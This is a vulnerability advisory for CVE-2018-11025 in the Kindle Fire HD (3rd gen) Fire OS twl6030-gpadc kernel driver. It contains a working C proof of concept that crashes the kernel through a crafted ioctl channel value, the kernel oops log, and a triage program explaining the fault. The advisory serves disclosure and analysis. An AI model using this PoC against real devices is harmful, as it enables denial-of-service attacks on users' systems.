(CVE-2018-11025) Amazon Kindle Fire HD (3rd) Fire OS kernel component vulnerability

1. Vulnerability overview

The kernel module omap/drivers/mfd/twl6030-gpadc.c in the kernel component of Amazon Kindle Fire HD (3rd) Fire OS 4.5.5.3 allows an attacker to inject a crafted argument through the argument of an ioctl on the device /dev/twl6030-gpadc with command 24832, causing a kernel crash. To explore this vulnerability, one must open the device file /dev/twl6030-gpadc and call the ioctl system call on it with command 24832 and a crafted payload as the third argument.

2. Affected versions

Fire OS 4.5.5.3

3. Reproduction

PoC

```c
/*
 * This is poc of Kindle Fire HD 3rd
 * A bug in the ioctl interface of device file /dev/twl6030-gpadc causes
 * the system crash via IOCTL 24832.
 * This Poc should run with permission to do ioctl on /dev/twl6030-gpadc.
 */
#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <fcntl.h>
#include <errno.h>
#include <unistd.h>     /* close() */
#include <sys/ioctl.h>

const static char *driver = "/dev/twl6030-gpadc";
static int command = 24832;

/* Argument structure passed as the third ioctl parameter. */
struct twl6030_gpadc_user_parms {
    int channel;
    int status;
    unsigned short result;
};

int main(int argc, char **argv, char **env)
{
    struct twl6030_gpadc_user_parms payload;
    payload.channel = 0x9b2a9212;   /* crafted channel value */
    payload.status = 0x0;
    payload.result = 0x0;

    int fd = 0;
    fd = open(driver, O_RDWR);
    if (fd < 0) {
        printf("Failed to open %s, with errno %d\n", driver, errno);
        system("echo 1 > /data/local/tmp/log");
        return -1;
    }

    printf("Try ioctl device file '%s', with command 0x%x and payload NULL\n", driver, command);
    printf("System will crash and reboot.\n");
    if (ioctl(fd, command, &payload) < 0) {
        printf("Allocation of structs failed, %d\n", errno);
        system("echo 2 > /data/local/tmp/log");
        return -1;
    }
    close(fd);
    return 0;
}
```

Crash log

```
[18460.321624] Unable to handle kernel paging request at virtual address 4b3f25fc
[18460.330139] pgd = ca210000
[18460.333251] [4b3f25fc] *pgd=00000000
[18460.337768] Internal error: Oops: 5 [#1] PREEMPT SMP ARM
[18460.343810] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
[18460.351440] CPU: 0    Tainted: G           O  (3.4.83-gd2afc0bae69 #1)
[18460.358825] PC is at twl6030_gpadc_ioctl+0x160/0x180
[18460.364379] LR is at twl6030_gpadc_conversion+0x5c/0x484
[18460.370452] pc : [<c031b080>]    lr : [<c031a950>]    psr: 60030013
[18460.370452] sp : de94dd90  ip : 00000000  fp : de94df04
[18460.383422] r10: 00000000  r9 : dcccf608  r8 : bea875ec
[18460.389282] r7 : de94c000  r6 : 00000000  r5 : 00006100  r4 : bea875ec
[18460.396697] r3 : fffffeb4  r2 : 4b3f2730  r1 : de94dee8  r0 : 00000001
[18460.404113] Flags: nZCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment user
[18460.412048] Control: 10c5387d  Table: 8a21004a  DAC: 00000015
[18461.138885] Process twl6030_gpadc_i (pid: 12849, stack limit = 0xde94c2f8)
[18461.146697] Stack: (0xde94dd90 to 0xde94e000)
[18461.335296] Backtrace:
[18461.338317] [<c031af20>] (twl6030_gpadc_ioctl+0x0/0x180) from [<c0136044>] (do_vfs_ioctl+0x8c/0x5b4)
[18461.348571]  r7:d683fb40 r6:00000004 r5:d683fb40 r4:00000000
[18461.355560] [<c0135fb8>] (do_vfs_ioctl+0x0/0x5b4) from [<c01365e0>] (sys_ioctl+0x74/0x84)
[18461.364807] [<c013656c>] (sys_ioctl+0x0/0x84) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[18461.374206]  r8:c0013e08 r7:00000036 r6:00000000 r5:00010e5c r4:bea87618
[18461.382507] Code: e24b101c e30f3eb4 e34f3fff e0812102 (e5122134)
[18461.534057] ---[ end trace f98f4a7b98572f61 ]---
[18461.540374] Kernel panic - not syncing: Fatal exception
```
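The fault address in the crash log can be re-derived from the PoC's channel value and the last two words of the Code: line. The C program below is an added triage example, not part of the original document; it assumes r2 held payload.channel when the ADD executed, and its function names are illustrative.

```c
#include <stdint.h>
#include <stdio.h>

/* Values copied from the PoC and the crash log on this page. */
#define POC_CHANNEL 0x9b2a9212u /* payload.channel                      */
#define OOPS_R1     0xde94dee8u /* r1 in the register dump              */
#define OOPS_R2     0x4b3f2730u /* r2 in the register dump              */
#define OOPS_FAULT  0x4b3f25fcu /* "paging request at virtual address"  */
#define INSN_ADD    0xe0812102u /* Code: word before the faulting one   */
#define INSN_LDR    0xe5122134u /* Code: faulting word, in parentheses  */

/* Apply ARM "ADD Rd, Rn, Rm, LSL #imm" to regs; -1 if insn is another form. */
static int exec_add_lsl(uint32_t insn, uint32_t regs[16])
{
    if ((insn & 0x0fe00070u) != 0x00800000u)
        return -1;
    unsigned rn = (insn >> 16) & 15, rd = (insn >> 12) & 15, rm = insn & 15;
    regs[rd] = regs[rn] + (regs[rm] << ((insn >> 7) & 31));
    return 0;
}

/* Effective address of ARM "LDR Rd, [Rn, #+/-imm12]"; -1 if another form. */
static int ldr_address(uint32_t insn, const uint32_t regs[16], uint32_t *addr)
{
    if ((insn & 0x0f500000u) != 0x05100000u)
        return -1;
    uint32_t base = regs[(insn >> 16) & 15], imm = insn & 0xfffu;
    *addr = (insn & (1u << 23)) ? base + imm : base - imm;
    return 0;
}

/* Assumption under test: r2 held payload.channel when the ADD executed. */
static int replay(uint32_t r1, uint32_t channel, uint32_t *r2, uint32_t *fault)
{
    uint32_t regs[16] = {0, r1, channel}; /* only r1 and r2 are inputs */
    if (exec_add_lsl(INSN_ADD, regs) || ldr_address(INSN_LDR, regs, fault))
        return -1;
    *r2 = regs[2];
    return 0;
}

int main(void)
{
    uint32_t r2 = 0, fault = 0;
    int rc = replay(OOPS_R1, POC_CHANNEL, &r2, &fault);
    printf("rc=%d r2=%08x fault=%08x\n", rc, (unsigned)r2, (unsigned)fault);
    return !(rc == 0 && r2 == OOPS_R2 && fault == OOPS_FAULT);
}
```

Both computed values match the oops, which is consistent with the handler using the unvalidated channel field as an index (scaled by 4) from an address inside the kernel stack range shown in the Stack: line. Rejecting out-of-range channel values before that access removes the wild read.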
